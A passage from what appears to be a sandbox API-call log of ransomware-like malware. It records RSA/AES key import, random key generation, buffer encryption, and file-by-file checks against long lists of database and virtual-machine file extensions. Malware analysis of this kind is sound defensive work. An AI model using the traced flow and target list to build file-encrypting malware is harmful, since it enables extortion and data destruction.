Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".pvm") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".vmem") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".vmsn") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".vmsd") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".nvram") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".vmx") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".raw") returned 0x0 [0161.379] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".qcow2") returned 0x0 [0161.380] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".subvol") returned 0x0 [0161.380] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".bin") returned 0x0 [0161.380] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".vsv") returned 0x0 [0161.380] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".avhd") returned 0x0 [0161.380] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".vmrs") returned 0x0 [0161.380] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".vhdx") returned 0x0 [0161.380] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".avdx") returned 0x0 [0161.380] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".vmcx") returned 0x0 [0161.380] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".iso") returned 0x0 [0161.380] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.380] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0161.383] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0161.383] SetEndOfFile (hFile=0x6f0) returned 1 [0161.384] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.384] ReadFile (hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x1aa2fc, lpNumberOfBytesRead=0x397fc80, lpOverlapped=0x0) Thread: id = 5 os_tid = 0xb30 [0055.534] VirtualAlloc (lpAddress=0x0, dwSize=0x500040, flAllocationType=0x3000, flProtect=0x4) returned 0x5030000 [0055.535] CryptAcquireContextA (in: phProv=0x3abfcf4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3abfcf4*=0xed0cd0) returned 1 [0055.535] CryptImportKey (in: hProv=0xed0cd0, pbData=0x2826098, dwDataLen=0x1000, hPubKey=0x0, dwFlags=0x0, phKey=0x3abff80 | out: phKey=0x3abff80*=0xecf860) returned 1 [0055.536] Sleep (dwMilliseconds=0x1f4) [0060.625] Sleep (dwMilliseconds=0x1f4) [0069.842] Sleep (dwMilliseconds=0x1f4) [0070.518] Sleep (dwMilliseconds=0x1f4) [0071.043] Sleep (dwMilliseconds=0x1f4) [0071.558] Sleep (dwMilliseconds=0x1f4) [0072.073] Sleep (dwMilliseconds=0x1f4) [0072.724] Sleep (dwMilliseconds=0x1f4) [0076.826] Sleep (dwMilliseconds=0x1f4) [0077.330] Sleep (dwMilliseconds=0x1f4) [0077.844] Sleep (dwMilliseconds=0x1f4) [0078.360] Sleep (dwMilliseconds=0x1f4) [0078.874] Sleep (dwMilliseconds=0x1f4) [0079.389] Sleep (dwMilliseconds=0x1f4) [0079.904] Sleep (dwMilliseconds=0x1f4) [0080.418] Sleep (dwMilliseconds=0x1f4) [0080.933] Sleep (dwMilliseconds=0x1f4) [0081.448] Sleep (dwMilliseconds=0x1f4) [0081.963] Sleep (dwMilliseconds=0x1f4) [0082.478] Sleep (dwMilliseconds=0x1f4) [0083.190] Sleep (dwMilliseconds=0x1f4) [0084.115] Sleep (dwMilliseconds=0x1f4) [0084.654] Sleep (dwMilliseconds=0x1f4) [0085.161] Sleep (dwMilliseconds=0x1f4) [0085.676] Sleep (dwMilliseconds=0x1f4) [0086.254] Sleep (dwMilliseconds=0x1f4) [0086.767] Sleep (dwMilliseconds=0x1f4) [0087.283] Sleep (dwMilliseconds=0x1f4) [0087.797] Sleep (dwMilliseconds=0x1f4) [0088.598] Sleep (dwMilliseconds=0x1f4) [0089.500] Sleep (dwMilliseconds=0x1f4) [0090.048] Sleep (dwMilliseconds=0x1f4) [0090.561] Sleep (dwMilliseconds=0x1f4) [0091.233] Sleep (dwMilliseconds=0x1f4) [0091.754] Sleep (dwMilliseconds=0x1f4) [0092.532] Sleep (dwMilliseconds=0x1f4) [0093.111] Sleep (dwMilliseconds=0x1f4) [0093.644] Sleep (dwMilliseconds=0x1f4) [0094.202] Sleep (dwMilliseconds=0x1f4) [0094.737] Sleep (dwMilliseconds=0x1f4) [0095.238] Sleep (dwMilliseconds=0x1f4) [0095.754] Sleep (dwMilliseconds=0x1f4) [0096.268] Sleep (dwMilliseconds=0x1f4) [0096.800] Sleep (dwMilliseconds=0x1f4) [0097.313] Sleep (dwMilliseconds=0x1f4) [0097.835] Sleep (dwMilliseconds=0x1f4) [0098.359] Sleep (dwMilliseconds=0x1f4) [0098.874] Sleep (dwMilliseconds=0x1f4) [0099.879] Sleep (dwMilliseconds=0x1f4) [0100.423] Sleep (dwMilliseconds=0x1f4) [0100.945] Sleep (dwMilliseconds=0x1f4) [0101.461] Sleep (dwMilliseconds=0x1f4) [0101.995] Sleep (dwMilliseconds=0x1f4) [0102.725] Sleep (dwMilliseconds=0x1f4) [0103.335] Sleep (dwMilliseconds=0x1f4) [0103.870] Sleep (dwMilliseconds=0x1f4) [0104.388] Sleep (dwMilliseconds=0x1f4) [0105.011] Sleep (dwMilliseconds=0x1f4) [0105.559] Sleep (dwMilliseconds=0x1f4) [0106.585] Sleep (dwMilliseconds=0x1f4) [0107.110] Sleep (dwMilliseconds=0x1f4) [0107.735] Sleep (dwMilliseconds=0x1f4) [0108.360] Sleep (dwMilliseconds=0x1f4) [0108.900] Sleep (dwMilliseconds=0x1f4) [0109.403] Sleep (dwMilliseconds=0x1f4) [0110.104] Sleep (dwMilliseconds=0x1f4) [0110.605] Sleep (dwMilliseconds=0x1f4) [0111.338] Sleep (dwMilliseconds=0x1f4) [0111.859] Sleep (dwMilliseconds=0x1f4) [0112.591] Sleep (dwMilliseconds=0x1f4) [0113.127] Sleep (dwMilliseconds=0x1f4) [0113.652] Sleep (dwMilliseconds=0x1f4) [0114.286] Sleep (dwMilliseconds=0x1f4) [0114.804] Sleep (dwMilliseconds=0x1f4) [0115.736] Sleep (dwMilliseconds=0x1f4) [0116.253] Sleep (dwMilliseconds=0x1f4) [0116.946] Sleep (dwMilliseconds=0x1f4) [0117.515] Sleep (dwMilliseconds=0x1f4) [0118.030] Sleep (dwMilliseconds=0x1f4) [0118.545] Sleep (dwMilliseconds=0x1f4) [0119.307] Sleep (dwMilliseconds=0x1f4) [0119.815] Sleep (dwMilliseconds=0x1f4) [0120.746] Sleep (dwMilliseconds=0x1f4) [0121.272] Sleep (dwMilliseconds=0x1f4) [0121.805] Sleep (dwMilliseconds=0x1f4) [0122.494] Sleep (dwMilliseconds=0x1f4) [0123.047] Sleep (dwMilliseconds=0x1f4) [0123.573] Sleep (dwMilliseconds=0x1f4) [0124.084] Sleep (dwMilliseconds=0x1f4) [0124.844] Sleep (dwMilliseconds=0x1f4) [0125.347] Sleep (dwMilliseconds=0x1f4) [0125.862] Sleep (dwMilliseconds=0x1f4) [0126.377] Sleep (dwMilliseconds=0x1f4) [0126.891] Sleep (dwMilliseconds=0x1f4) [0127.572] Sleep (dwMilliseconds=0x1f4) [0128.217] Sleep (dwMilliseconds=0x1f4) [0128.731] Sleep (dwMilliseconds=0x1f4) [0129.247] Sleep (dwMilliseconds=0x1f4) [0129.761] Sleep (dwMilliseconds=0x1f4) [0130.380] Sleep (dwMilliseconds=0x1f4) [0130.916] Sleep (dwMilliseconds=0x1f4) [0131.430] Sleep (dwMilliseconds=0x1f4) [0131.945] Sleep (dwMilliseconds=0x1f4) [0132.569] Sleep (dwMilliseconds=0x1f4) [0136.945] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0136.945] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0136.945] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0136.946] GetFileAttributesW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini")) returned 0x26 [0136.946] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0136.946] GetLastError () returned 0x0 [0136.946] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=174) returned 1 [0136.946] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".4dd") returned 0x0 [0136.946] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".4dl") returned 0x0 [0136.946] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".accdb") returned 0x0 [0136.946] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".accdc") returned 0x0 [0136.946] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".accde") returned 0x0 [0136.946] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".accdr") returned 0x0 [0136.946] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".accdt") returned 0x0 [0136.946] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".accft") returned 0x0 [0136.946] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".adb") returned 0x0 [0136.946] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".ade") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".adf") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".adp") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".arc") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".ora") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".alf") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".ask") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".btr") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".bdf") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".cat") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".cdb") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".ckp") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".cma") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".cpd") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dacpac") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dad") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dadiagrams") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".daschema") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".db") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".db-shm") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".db-wal") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".db3") returned 0x0 [0136.947] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dbc") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dbf") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dbs") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dbt") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dbv") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dbx") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dcb") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dct") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dcx") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".ddl") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dlis") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dp1") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dqy") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dsk") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dsn") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dtsx") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".dxl") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".eco") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".ecx") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".edb") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".epim") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".exb") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".fcd") returned 0x0 [0136.948] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".fdb") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".fic") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".fmp") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".fmp12") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".fmpsl") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".fol") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".fp3") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".fp4") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".fp5") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".fp7") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".fpt") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".frm") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".gdb") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".grdb") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".gwi") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".hdb") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".his") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".ib") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".idb") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".ihx") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".itdb") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".itw") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".jet") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".jtx") returned 0x0 [0136.949] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".kdb") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".kexi") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".kexic") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".kexis") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".lgc") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".lwx") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".maf") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".maq") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".mar") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".mas") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".mav") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".mdb") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".mdf") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".mpd") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".mrg") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".mud") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".mwb") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".myd") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".ndf") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".nnt") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".nrmlib") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".ns2") returned 0x0 [0136.950] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".ns3") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".ns4") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".nsf") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".nv") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".nv2") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".nwdb") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".nyf") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".odb") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".oqy") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".orx") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".owc") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".p96") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".p97") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".pan") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".pdb") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".pdm") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".pnz") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".qry") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".qvd") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".rbf") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".rctd") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".rod") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".rodx") returned 0x0 [0136.951] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".rpd") returned 0x0 [0136.952] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".rsd") returned 0x0 [0136.952] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".sas7bdat") returned 0x0 [0136.952] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".sbf") returned 0x0 [0136.952] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".scx") returned 0x0 [0136.952] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".sdb") returned 0x0 [0136.952] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".sdc") returned 0x0 [0136.952] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".sdf") returned 0x0 [0136.952] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".sis") returned 0x0 [0136.952] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".spq") returned 0x0 [0136.952] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".sql") returned 0x0 [0136.952] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".sqlite") returned 0x0 [0136.952] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".sqlite3") returned 0x0 [0136.952] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".sqlitedb") returned 0x0 [0136.952] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".te") returned 0x0 [0136.952] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".temx") returned 0x0 [0136.953] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".tmd") returned 0x0 [0136.953] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".tps") returned 0x0 [0136.953] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".trc") returned 0x0 [0136.953] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".trm") returned 0x0 [0136.953] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".udb") returned 0x0 [0136.953] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".udl") returned 0x0 [0136.953] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".usr") returned 0x0 [0136.953] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".v12") returned 0x0 [0136.953] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".vis") returned 0x0 [0136.953] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".vpd") returned 0x0 [0136.953] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".vvv") returned 0x0 [0136.953] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".wdb") returned 0x0 [0136.953] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".wmdb") returned 0x0 [0136.953] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".wrk") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".xdb") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".xld") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".xmlff") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".abcddb") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".abs") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".abx") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".accdw") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".adn") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".db2") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".fm5") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".hjt") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".icg") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".icr") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".kdb") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".lut") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".maw") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".mdn") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".mdt") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".vdi") returned 0x0 [0136.954] StrStrIW 